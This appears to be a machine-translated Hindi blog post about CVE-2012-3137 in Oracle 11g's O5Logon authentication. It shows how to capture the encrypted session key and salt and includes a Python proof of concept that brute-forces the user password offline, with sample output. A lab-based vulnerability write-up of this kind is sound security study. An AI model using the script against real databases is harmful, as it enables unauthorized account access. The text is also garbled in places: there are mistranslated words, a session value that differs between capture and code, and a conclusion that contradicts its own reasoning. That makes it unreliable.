Oracle 11g ऑथेंटिकेशन प्रोटोकॉल में भेद्यता

बहुत समय पहले ऐसा नहीं था कि ओरेकल डेटाबेस के 11.1 और 11.2 में इस्तेमाल किए गए O5Logon ऑथेंटिकेशन प्रोटोकॉल में एक नई भेद्यता (जिसे नंबर CVE-2012-3137 मिला था ) के बारे में। भेद्यता दूरस्थ उपयोगकर्ता को सर्वर से प्राप्त एन्क्रिप्टेड सत्र पहचानकर्ता पर एक क्रूर हमले की शुरूआत करके एक एक्सेस पासवर्ड प्राप्त करने की अनुमति देती है। यह सुविधा डेटाबेस सर्वर पर अतिरिक्त नेटवर्क अनुरोध भेजे बिना स्थानीय रूप से उपयोगकर्ता पासवर्ड का पता लगाना संभव बनाती है।

O5Logon ऑपरेशनल अवलोकन

सर्वर के साथ सहभागिता निम्नानुसार होती है:

1. क्लाइंट सर्वर से कनेक्ट होता है और उपयोगकर्ता नाम भेजता है
2. सर्वर एक सत्र पहचानकर्ता उत्पन्न करता है और एईएस -192 का उपयोग करके इसे एन्क्रिप्ट करता है। कुंजी उपयोगकर्ता पासवर्ड का SHA1 हैश और इसमें जोड़ा गया नमक है
3. सर्वर ग्राहक को एन्क्रिप्टेड सत्र पहचानकर्ता और नमक भेजता है
4. ग्राहक अपने पासवर्ड और प्राप्त नमक से हैश प्राप्त करके एक कुंजी बनाता है। इस कुंजी का उपयोग करते हुए, क्लाइंट सर्वर से प्राप्त सत्र डेटा को डिक्रिप्ट करता है।
5. डिक्रिप्टेड सर्वर सत्र पहचानकर्ता के आधार पर, ग्राहक एक नई साझा कुंजी बनाता है, जिसे बाद में उपयोग किया जाएगा

मुख्य ब्याज 1-3 चरण हैं, जिन्हें निम्नानुसार दर्शाया जा सकता है:

कनेक्शन की शुरुआत से ही सर्वर पासवर्ड चयन के लिए आवश्यक सभी सूचनाओं को प्रसारित करता है। सत्र आईडी की प्रमुख विशेषता एक हमले की अनुमति देती है: सार्वजनिक सत्र पहचानकर्ता के अंतिम 8 बाइट्स में हमेशा आठ शामिल होते हैं। यह जानकारी सही डिक्रिप्शन निर्धारित करने के लिए पर्याप्त है।

इस समस्या की एक और विशेषता यह है कि तीसरे चरण के बाद कनेक्शन को तोड़ना, कनेक्शन के प्रयास का तथ्य लॉग में प्रदर्शित नहीं होगा, अर्थात। हमले को पूरी तरह से अनसुना किया जा सकता है।

व्यावहारिक पहलू

भेद्यता का परीक्षण करने के लिए, ओरेकल द्वारा इस्तेमाल की जाने वाली आभासी मशीन का एक स्वतंत्र रूप से वितरित डंप प्रशिक्षण डेवलपर्स के लिए और पूर्व-स्थापित डेटाबेस संस्करण युक्त 11.2.0 स्थापित है।

स्थापना के बाद, आप मानक पोर्ट के माध्यम से डेटाबेस से कनेक्ट करने का प्रयास कर सकते हैं, उदाहरण के लिए, पायथन और cx_Offcle लाइब्रेरी। परीक्षण के रूप में, अंतर्निहित उपयोगकर्ता प्रणाली के लिए चयन किया गया था। यह आगे के हमले के लिए सभी आवश्यक डेटा प्राप्त करने के लिए केवल उपयोगकर्ता नाम जानने के लिए पर्याप्त है:

>>> import cx_Oracle >>> con = cx_Oracle.connect('system/wrongpassword@192.168.56.104/orcl') Traceback (most recent call last): File "<stdin>", line 1, in <module> cx_Oracle.DatabaseError: ORA-01017: invalid username/password; logon denied 

इस मामले में एन्क्रिप्टेड सत्र आईडी और नमक प्राप्त करने के लिए, Wireshark का उपयोग करने का सबसे आसान तरीका था:


निम्नलिखित मूल्य यहां उपयोगी होंगे:

सत्र आईडी (AUTH_SESSKEY) : EA2043CB8B46E3864311C68BDC161F8CA170363C1E6F57F3EBC6435F541A841B8DB16DAB16EAAB5422553A759814143E78767673

नमक (AUTH_VFR_DATA) : A7193E546377EC56639E

अवधारणा का प्रमाण

पासवर्ड के सत्र और पाशविक बल को डिक्रिप्ट करने के लिए, घुटने पर निम्न कोड लिखा गया था:

 #-*-coding:utf8 -*- import hashlib from Crypto.Cipher import AES def decrypt(session,salt,password): pass_hash = hashlib.sha1(password+salt) #     24  key = pass_hash.digest() + '\x00\x00\x00\x00' decryptor = AES.new(key,AES.MODE_CBC) plain = decryptor.decrypt(session) return plain #   48  session_hex = 'EA2043CB8B46E3864311C68BDC161F8CA170363C1E6F57F3EBC6435F541A8239B6DBA16EAAB5422553A7598143E78767' # 10  salt_hex = 'A7193E546377EC56639E' passwords = ['test','password','oracle','demo'] for password in passwords: session_id = decrypt(session_hex.decode('hex'),salt_hex.decode('hex'),password) print 'Decrypted session_id for password "%s" is %s' % (password,session_id.encode('hex')) if session_id[40:] == '\x08\x08\x08\x08\x08\x08\x08\x08': print 'PASSWORD IS "%s"' % password break 

कार्यक्रम शुरू करते समय हमें मिलता है:

 Decrypted session_id for password "test" is 26998331454aeb10fbf10ae8a3deac8e9e0531378089a3acaa9294f3256227bc00feae272db6c1eafb105d6baa953274 Decrypted session_id for password "password" is 8a62f6dcca35f6886ea5b0cbd24791cfd0a3390eb29c64a4d58bfe1c19e27df0de315772ea84e28ddd9a126dfdec134d Decrypted session_id for password "oracle" is 58b6e23a31ee7136d4893a01d48cd17e841fc3e90545711668a69d9c28b5c5d8819a4f7a961334320808080808080808 PASSWORD IS "oracle" [Finished in 0.1s] 

पासवर्ड सफलतापूर्वक चुना गया है।

निष्कर्ष

Oracle ने इस समस्या को 11.2.0.3 संस्करण में हल किया, जिससे उपयोगकर्ताओं को नए प्रमाणीकरण तंत्र का उपयोग करने की अनुमति मिली, जो क्लाइंट और सर्वर भागों के लिए sqlnet.ora फ़ाइलों में स्पष्ट रूप से रजिस्टर करने के लिए आवश्यक है:

SQLNET.ALLOWED_LOGON_VERSION=12

लेकिन मैं कह सकता हूं कि यह समाधान अधिकांश कामकाजी प्रणालियों के लिए स्वीकार्य है, क्योंकि सर्वर साइड के अलावा, क्लाइंट्स को फिर से कॉन्फ़िगर करना आवश्यक है। हमेशा की तरह ऐसे मामलों में, मजबूत पासवर्ड का उपयोग और नेटवर्क एक्सेस के स्तर पर स्पष्ट प्रतिबंध को उचित सिफारिशें माना जा सकता है।